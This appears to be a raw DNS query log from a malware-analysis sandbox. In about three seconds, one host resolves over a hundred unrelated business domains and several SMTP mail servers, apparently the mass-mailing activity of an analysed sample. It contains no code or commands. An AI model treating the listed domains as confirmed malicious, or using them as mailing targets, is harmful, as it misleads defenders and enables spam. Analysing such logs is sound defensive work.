                                                                                                                                                                              Sep 15, 2023 07:27:21.989346981 CEST8.8.8.8192.168.2.30xc704No error (0)k-nikko.com13.113.204.223A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.989346981 CEST8.8.8.8192.168.2.30xc704No error (0)k-nikko.com18.179.184.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.997777939 CEST8.8.8.8192.168.2.30x4640No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.019399881 CEST8.8.8.8192.168.2.30x7428No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.027683973 CEST8.8.8.8192.168.2.30x83d0No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.053750992 CEST8.8.8.8192.168.2.30xa6edNo error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.064102888 CEST8.8.8.8192.168.2.30x31feNo error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.067718983 CEST8.8.8.8192.168.2.30xe0f0No error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.067718983 CEST8.8.8.8192.168.2.30xe0f0No error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.067718983 CEST8.8.8.8192.168.2.30xe0f0No error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.067718983 CEST8.8.8.8192.168.2.30xe0f0No error (0)in1.smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.067718983 CEST8.8.8.8192.168.2.30xe0f0No error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.067718983 CEST8.8.8.8192.168.2.30xe0f0No error (0)in1.smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.074286938 CEST8.8.8.8192.168.2.30xb2abName error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.077126980 CEST8.8.8.8192.168.2.30xf23fNo error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.094774961 CEST8.8.8.8192.168.2.30x2087No error (0)gmail-smtp-in.l.google.com172.253.63.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.101481915 CEST8.8.8.8192.168.2.30xc98cNo error (0)x96.com104.21.73.229A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.101481915 CEST8.8.8.8192.168.2.30xc98cNo error (0)x96.com172.67.167.96A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.108135939 CEST8.8.8.8192.168.2.30x5a16Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.112519026 CEST8.8.8.8192.168.2.30x274aNo error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.112519026 CEST8.8.8.8192.168.2.30x274aNo error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.113879919 CEST8.8.8.8192.168.2.30x3052No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.113879919 CEST8.8.8.8192.168.2.30x3052No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.116764069 CEST8.8.8.8192.168.2.30x538cNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.136742115 CEST8.8.8.8192.168.2.30x4155No error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.136742115 CEST8.8.8.8192.168.2.30x4155No error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.136742115 CEST8.8.8.8192.168.2.30x4155No error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.136742115 CEST8.8.8.8192.168.2.30x4155No error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.136742115 CEST8.8.8.8192.168.2.30x4155No error (0)smtp.aol.g03.yahoodns.net66.218.88.159A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.137010098 CEST8.8.8.8192.168.2.30x4141No error (0)bount.com.tw104.21.76.140A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.137010098 CEST8.8.8.8192.168.2.30x4141No error (0)bount.com.tw172.67.196.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.137567043 CEST8.8.8.8192.168.2.30x88afNo error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.143510103 CEST8.8.8.8192.168.2.30x468eNo error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.151884079 CEST8.8.8.8192.168.2.30x4e62Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.162106037 CEST8.8.8.8192.168.2.30x15a2No error (0)revoldia.net154.201.225.123A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.174989939 CEST8.8.8.8192.168.2.30x76adName error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.187710047 CEST8.8.8.8192.168.2.30x9530No error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.187772036 CEST8.8.8.8192.168.2.30x63dcNo error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.187772036 CEST8.8.8.8192.168.2.30x63dcNo error (0)in1.smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.187772036 CEST8.8.8.8192.168.2.30x63dcNo error (0)in1.smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.187772036 CEST8.8.8.8192.168.2.30x63dcNo error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.187772036 CEST8.8.8.8192.168.2.30x63dcNo error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.187772036 CEST8.8.8.8192.168.2.30x63dcNo error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.190813065 CEST8.8.8.8192.168.2.30xcb0cNo error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.193533897 CEST8.8.8.8192.168.2.30x6ea2No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.222625017 CEST8.8.8.8192.168.2.30x1812No error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.222625017 CEST8.8.8.8192.168.2.30x1812No error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.225763083 CEST8.8.8.8192.168.2.30x3ff6No error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.233707905 CEST8.8.8.8192.168.2.30x40ccServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.246146917 CEST8.8.8.8192.168.2.30x8839Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.257514954 CEST8.8.8.8192.168.2.30xecbdName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.262356043 CEST8.8.8.8192.168.2.30xe5a3No error (0)603888.com67.21.93.239A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.263324976 CEST8.8.8.8192.168.2.30x92bfNo error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.273855925 CEST8.8.8.8192.168.2.30xe8bcNo error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.285531998 CEST8.8.8.8192.168.2.30x54e4No error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.289880037 CEST8.8.8.8192.168.2.30x5ed8No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.308679104 CEST8.8.8.8192.168.2.30xd7dfNo error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.320508957 CEST8.8.8.8192.168.2.30xf18No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.323597908 CEST8.8.8.8192.168.2.30x8e9eNo error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.324194908 CEST8.8.8.8192.168.2.30xee1bNo error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.324194908 CEST8.8.8.8192.168.2.30xee1bNo error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.351108074 CEST8.8.8.8192.168.2.30x1005No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.366516113 CEST8.8.8.8192.168.2.30xc45dName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.371922970 CEST8.8.8.8192.168.2.30xf0b5No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.382571936 CEST8.8.8.8192.168.2.30x1465No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.382571936 CEST8.8.8.8192.168.2.30x1465No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.382571936 CEST8.8.8.8192.168.2.30x1465No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.466087103 CEST8.8.8.8192.168.2.30x12fbNo error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.487999916 CEST8.8.8.8192.168.2.30x510eNo error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.504616976 CEST8.8.8.8192.168.2.30xdf34Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.523600101 CEST8.8.8.8192.168.2.30x30bbNo error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.550337076 CEST8.8.8.8192.168.2.30x5bbfNo error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.566302061 CEST8.8.8.8192.168.2.30xe99cNo error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.566302061 CEST8.8.8.8192.168.2.30xe99cNo error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.569202900 CEST8.8.8.8192.168.2.30x41baNo error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.572237015 CEST8.8.8.8192.168.2.30x7977No error (0)dyag-eng.com172.232.25.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.589263916 CEST8.8.8.8192.168.2.30x9086No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.591388941 CEST8.8.8.8192.168.2.30xf496No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.593012094 CEST8.8.8.8192.168.2.30x69edNo error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.640870094 CEST8.8.8.8192.168.2.30x2a6dNo error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.640927076 CEST8.8.8.8192.168.2.30x6c4fNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.640927076 CEST8.8.8.8192.168.2.30x6c4fNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.640927076 CEST8.8.8.8192.168.2.30x6c4fNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.640927076 CEST8.8.8.8192.168.2.30x6c4fNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.663353920 CEST8.8.8.8192.168.2.30x2228No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.663353920 CEST8.8.8.8192.168.2.30x2228No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.664242029 CEST8.8.8.8192.168.2.30xc612No error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.664953947 CEST8.8.8.8192.168.2.30xf09fNo error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.917659998 CEST8.8.8.8192.168.2.30xa517No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.917659998 CEST8.8.8.8192.168.2.30xa517No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.917659998 CEST8.8.8.8192.168.2.30xa517No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.951071024 CEST8.8.8.8192.168.2.30xd3fdNo error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.008347034 CEST8.8.8.8192.168.2.30x8732No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.041933060 CEST8.8.8.8192.168.2.30x9f65No error (0)sigtoa.com172.67.160.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.041933060 CEST8.8.8.8192.168.2.30x9f65No error (0)sigtoa.com104.21.49.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.184253931 CEST8.8.8.8192.168.2.30xbfebNo error (0)impexnc.com208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.198834896 CEST8.8.8.8192.168.2.30x4949No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.199757099 CEST8.8.8.8192.168.2.30xa51aName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.218257904 CEST8.8.8.8192.168.2.30xcb6aName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.251616001 CEST8.8.8.8192.168.2.30xb3abNo error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.252213955 CEST8.8.8.8192.168.2.30xa874No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.255352974 CEST8.8.8.8192.168.2.30x40f1No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.299310923 CEST8.8.8.8192.168.2.30x14fNo error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.305671930 CEST8.8.8.8192.168.2.30x2548Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.307495117 CEST8.8.8.8192.168.2.30x9be7No error (0)shittas.com192.3.246.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.323904991 CEST8.8.8.8192.168.2.30x7ae2No error (0)dayvo.com104.21.68.7A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.323904991 CEST8.8.8.8192.168.2.30x7ae2No error (0)dayvo.com172.67.184.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.331130981 CEST8.8.8.8192.168.2.30xd792No error (0)k-nikko.com18.179.184.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.331130981 CEST8.8.8.8192.168.2.30xd792No error (0)k-nikko.com13.113.204.223A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.343544960 CEST8.8.8.8192.168.2.30x9f6cNo error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.376007080 CEST8.8.8.8192.168.2.30xba7No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.376007080 CEST8.8.8.8192.168.2.30xba7No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.412688971 CEST8.8.8.8192.168.2.30xc936Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.417587042 CEST8.8.8.8192.168.2.30x7100No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.456932068 CEST8.8.8.8192.168.2.30xbc47No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.461885929 CEST8.8.8.8192.168.2.30xe1d7No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.461885929 CEST8.8.8.8192.168.2.30xe1d7No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.462416887 CEST8.8.8.8192.168.2.30xe099No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.500293016 CEST8.8.8.8192.168.2.30xeff5No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.508501053 CEST8.8.8.8192.168.2.30x7cf9No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.517102003 CEST8.8.8.8192.168.2.30x343bNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.528785944 CEST8.8.8.8192.168.2.30x1c37No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.543272972 CEST8.8.8.8192.168.2.30x453dNo error (0)hyab.se104.21.52.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.543272972 CEST8.8.8.8192.168.2.30x453dNo error (0)hyab.se172.67.199.57A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.550580978 CEST8.8.8.8192.168.2.30x1c37No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.562597990 CEST8.8.8.8192.168.2.30x85b5No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.572473049 CEST8.8.8.8192.168.2.30x4f0cNo error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.574271917 CEST8.8.8.8192.168.2.30x58deNo error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.655191898 CEST8.8.8.8192.168.2.30x586cNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.690342903 CEST8.8.8.8192.168.2.30xda41No error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.690632105 CEST8.8.8.8192.168.2.30x72acNo error (0)www.clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.690632105 CEST8.8.8.8192.168.2.30x72acNo error (0)www.clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.748001099 CEST8.8.8.8192.168.2.30x7915No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.748531103 CEST8.8.8.8192.168.2.30x555bNo error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.767100096 CEST8.8.8.8192.168.2.30x480cNo error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.806747913 CEST8.8.8.8192.168.2.30xd50No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.821686029 CEST8.8.8.8192.168.2.30xb614No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.898233891 CEST8.8.8.8192.168.2.30x780aNo error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.007823944 CEST8.8.8.8192.168.2.30x9edeNo error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.007823944 CEST8.8.8.8192.168.2.30x9edeNo error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.007823944 CEST8.8.8.8192.168.2.30x9edeNo error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.043783903 CEST8.8.8.8192.168.2.30xb0caNo error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.045044899 CEST8.8.8.8192.168.2.30x6edaNo error (0)sinwal.com172.67.206.199A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.045044899 CEST8.8.8.8192.168.2.30x6edaNo error (0)sinwal.com104.21.50.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.047359943 CEST8.8.8.8192.168.2.30x4355No error (0)araax.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.047359943 CEST8.8.8.8192.168.2.30x4355No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.047359943 CEST8.8.8.8192.168.2.30x4355No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.047359943 CEST8.8.8.8192.168.2.30x4355No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.058357954 CEST8.8.8.8192.168.2.30x9f0No error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.060981989 CEST8.8.8.8192.168.2.30xea24No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.094408989 CEST8.8.8.8192.168.2.30xdcc6No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.116350889 CEST8.8.8.8192.168.2.30x4414No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.198656082 CEST8.8.8.8192.168.2.30xc33dNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.266520023 CEST8.8.8.8192.168.2.30x3cb6Name error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.337222099 CEST8.8.8.8192.168.2.30x20ceNo error (0)cvswl.org104.21.55.151A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.337222099 CEST8.8.8.8192.168.2.30x20ceNo error (0)cvswl.org172.67.149.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.352396965 CEST8.8.8.8192.168.2.30xaac9Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.356055975 CEST8.8.8.8192.168.2.30x359fNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.389878988 CEST8.8.8.8192.168.2.30x8a62No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.389878988 CEST8.8.8.8192.168.2.30x8a62No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.538278103 CEST8.8.8.8192.168.2.30xefc1Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.539988995 CEST8.8.8.8192.168.2.30x1c37No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.580064058 CEST8.8.8.8192.168.2.30x5ff9No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.641416073 CEST8.8.8.8192.168.2.30x4e2bName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.642800093 CEST8.8.8.8192.168.2.30x3588No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.665384054 CEST8.8.8.8192.168.2.30x99a5Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.743592024 CEST8.8.8.8192.168.2.30x113dName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.774125099 CEST8.8.8.8192.168.2.30x5ef0No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.847830057 CEST8.8.8.8192.168.2.30x5fa0No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.869596958 CEST8.8.8.8192.168.2.30x4b39No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
